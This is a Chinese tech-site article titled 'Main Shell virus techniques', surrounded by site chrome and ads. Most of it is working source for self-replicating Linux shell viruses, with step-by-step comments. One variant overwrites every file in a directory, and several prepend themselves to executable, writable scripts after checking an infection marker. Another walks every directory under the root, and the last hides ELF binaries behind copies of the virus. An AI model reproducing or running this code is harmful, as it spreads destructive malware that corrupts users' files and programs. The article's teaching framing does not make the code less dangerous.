扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
主要的Shell病毒技术
当然,本文需要你至少了解Linux Shell编程的基础知识和一星点的病毒知识。OK!我们进入正题!
我们来看一个最原始的shell病毒,代码最能说明问题:
#shellvirus I for file in * do cp $0 $file done |
#shellvirus II for file in * do if test -f $file then if test -x $file then if test -w $file then if grep -s echo $file >.mmm then cp $0 $file fi; fi; fi; fi; fi done rm .mmm -f |
if grep -s echo $file>/.mmm |
#infection head -n 24 $0 > .test<-取自身保存到.test for file in *<-遍历文件系统 do if test -f $file<-判断是否为文件 then if test -x $file<-判断文件是否可执行 then if test -w $file<-判断文件是否可写 then if grep -s echo $file >.mmm<-判断是否为脚本程序 then head -n 1 $file >.mm<-提取要感染的脚本程序的第一行 if grep -s infection .mm >.mmm<-判断该文件是否已经被感染 then rm -f .mm<-已经被感染,则跳过 else<-还未被感染 cat $file > .SAVEE<-很熟悉吧?借用了传统的二进制文件的感染机制 cat .test > $file cat .SAVEE >> $file fi; fi; fi; fi; fi done rm .test .SAVEE .mmm .mm -f |
#infection for file in * ;do if test -f $file && test -x $file && test -w $file ; then if grep -s echo $file > /dev/nul ; then head -n 1 $file >.mm if grep -s infection .mm > /dev/nul ; then rm .mm -f ; else cat $file > .SAVEE head -n 13 $0 > $file cat .SAVEE >> $file fi; fi; fi done rm .SAVEE .mm -f |
#infection xtemp=$pwd<-保存当前路径 head -n 22 $0 > /.test for dir in /* ; do<-遍历/目录 if test -d $dir ; then<-如果是目录就cd该目录 cd $dir for file in * ; do<-遍历该目录文件 if test -f $file && test -x $file && test -w $file ; then<-确定文件是否可执行,可写 if grep -s echo $file > /dev/nul ; then<-确定是否为脚本程序 head -n 1 $file > .mm if grep -s infection .mm > /dev/nul ; then<-确定是否已经被感染 rm .mm -f ; else cat $file > /.SAVEE<-和前面的感染机制一样感染未被感染的脚本程序 cat /.test > $file cat /.SAVEE >> $file fi; fi; fi done cd .. fi done cd $xtemp<-返回原目录 rm /.test /.SAVEE .mm -f |
for file in * ;do if test -f $file && test -x $file && test -w $file ; then if file $file | grep -s 'ELF' > /dev/nul ; then mv $file .$file head -n 9 $0 > $file fi; fi done .$0 |
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者